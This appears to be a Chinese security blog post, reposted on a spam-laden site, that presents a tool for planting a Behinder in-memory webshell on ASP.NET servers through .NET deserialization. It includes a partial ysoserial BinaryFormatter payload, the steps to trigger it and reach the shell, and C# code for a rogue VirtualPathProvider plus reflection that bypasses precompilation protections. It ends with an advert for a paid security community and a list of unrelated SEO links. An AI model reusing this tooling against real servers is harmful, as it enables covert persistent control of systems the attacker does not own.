当前位置: 首页 > news >正文

织梦网站怎么上传视频金华手机模板建站

织梦网站怎么上传视频,金华手机模板建站,优化设计一年级下册数学答案,微信公众号做微网站吗01阅读须知 此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失&#xf…

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4BehinderWebShell 是一款利用.NET反序列化漏洞向内存中植入冰蝎WebShell的工具。通过这种方式,可以使用冰蝎客户端连接内存马获取WebShell,并且支持在.NET预编译环境下使用。以下是对该工具的详细介绍,包括其使用方法和代码解释。

图片

03使用方法

使用ysoserial生成冰蝎内存马的反序列化攻击负载,用于触发漏洞部分。以下是一个通过BinaryFormatter触发反序列化漏洞的示例负载,由于比较长此处仅展示一部分内容。

AAEAAAD/AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdG.........................

接着,将生成的反序列化攻击负载通过POST请求发送到目标服务器,触发.NET反序列化漏洞,成功后即植入冰蝎内存马。访问以下URL即可加载WebShell:

http://localhost:51448/fakepath31337/{0}.aspx

此处的fakepath31337路径可以自定义,通过修改Poc里的参数即可,其中{0}表示占位符,可以替换成任意字符,比如请求 /fakepath31337/36.aspx

图片

上图中没有出现异常错误,随后,通过冰蝎客户端成功连接到内存马,执行命令如下图所示

图片

04编码实现

Sharp4BehinderWebShell 主要通过注册自定义的虚拟路径提供程序(VirtualPathProvider)并结合反序列化攻击负载,实现对目标服务器的控制。首先该类继承自 System.Web.Hosting.VirtualPathProvider,用于注册虚拟路径提供程序,重写其方法以提供自定义路径和文件内容。

public class SamplePathProvider : System.Web.Hosting.VirtualPathProvider
{private string _virtualDir;private string _fileContent;public SamplePathProvider(string virtualDir, string fileContent): base(){_virtualDir = "/" + virtualDir.Replace(@"\", "/");_virtualDir = _virtualDir.Replace("//", "/").TrimEnd('/');// 初始化文件内容_fileContent = fileContent;}protected override void Initialize(){// 初始化操作,可以在这里添加自定义逻辑}
}

接着,该SampleVirtualFile类继承自 System.Web.Hosting.VirtualFile,用于表示虚拟文件,并提供文件内容,具体代码如下所示。

public class SampleVirtualFile : System.Web.Hosting.VirtualFile
{private string _fileContent;public bool Exists => true;public SampleVirtualFile(string virtualPath, string fileContent): base(virtualPath){// 初始化文件内容_fileContent = fileContent;}public override System.IO.Stream Open(){return new System.IO.MemoryStream(System.Text.Encoding.UTF8.GetBytes(_fileContent));}
}

同时,工具通过反射修改 System.Web.Compilation.BuildManager 类的私有字段,动态关闭预编译设置。如下所示。

if (System.Web.Compilation.BuildManager.IsPrecompiledApp)
{var typeBuildManager = typeof(System.Web.Compilation.BuildManager);var field_theBuildManager = typeBuildManager.GetField("_theBuildManager", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);var field_isPrecompiledAppComputed = typeBuildManager.GetField("_isPrecompiledAppComputed", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);var field_isPrecompiledApp = typeBuildManager.GetField("_isPrecompiledApp", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);var field_theBuildManager_instance = field_theBuildManager.GetValue(null);var field_isPrecompiledAppComputed_oldValue = field_isPrecompiledAppComputed.GetValue(field_theBuildManager_instance);var field_isPrecompiledApp_oldValue = field_isPrecompiledApp.GetValue(field_theBuildManager_instance);field_isPrecompiledAppComputed.SetValue(field_theBuildManager_instance, true);field_isPrecompiledApp.SetValue(field_theBuildManager_instance, false);// 注册自定义的 VirtualPathProviderSystem.Web.Hosting.HostingEnvironment.RegisterVirtualPathProvider(sampleProvider);field_isPrecompiledAppComputed.SetValue(field_theBuildManager_instance, field_isPrecompiledAppComputed_oldValue);field_isPrecompiledApp.SetValue(field_theBuildManager_instance, field_isPrecompiledApp_oldValue);
}

这里,通过 Compilation.BuildManager.IsPrecompiledApp 检查应用是否为预编译,最后,RegisterVirtualPathProvider(sampleProvider) 注册自定义的虚拟路径提供程序。

Sharp4BehinderWebShell 提供了一种利用.NET反序列化漏洞向内存中植入冰蝎WebShell的手段,可以绕过.NET预编译环境的限制,实现对目标系统的控制。

05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

http://www.yayakq.cn/news/492904/

相关文章:

  • 郑州网站建设搜索优化建筑网建设通网站作用是什么意思
  • 成都网站建设学校小企业网站建设流程
  • 大型网站架构实战app下载网址进入下载
  • 网站主页与导航栏的设计如何查看百度搜索指数
  • 江阴网络公司做网站备案编号不放在网站
  • 在网站设计公司上班好吗品牌网商城
  • 做网站上传那个目录万网买网站
  • 科技网站官网公众号简介有趣的文案
  • 网站网址怎么写网站文字规划
  • 苏州网站快速排名优化wordpress 刷浏览量
  • 收款网站怎么建设怎样建立公司网页
  • 上海网站建设公司推荐北京知名seo公司精准互联
  • 云南省建设系统网站做网站不备案
  • 常州房地产网站建设律师网站建设模板
  • 公司请做网站js网站模板
  • 如何跟进psd做网站温州企业建站系统模板
  • diywap手机网站系统wordpress 文件下载
  • 网站建设要不要监理做企业网站前期需要准备什么资料
  • 网站建设 蔬菜配送昆明网站建设培训班
  • 门户网站开发技术 知乎自己做的网页怎么上传网站吗
  • 怎么用手机创造网站格尔木网站建设公司
  • 成都网站运营公司做网站建设工资高吗
  • 游戏钓鱼网站怎么做广州官网建站
  • 电子商务网站建设ppt论某网站职能建设
  • 使用session和cookie实现网站自动登录 .net怎么制作古装视频
  • 给个网站你知道接给别人做网站的活
  • 平台建设上线网站中小学生在线做试卷的网站
  • 泸州网站建设价格找网站建设都需要注意哪些
  • 重庆网站制作公司小程序登录界面设计
  • 流浪动物网站开发wordpress主题教程视频教程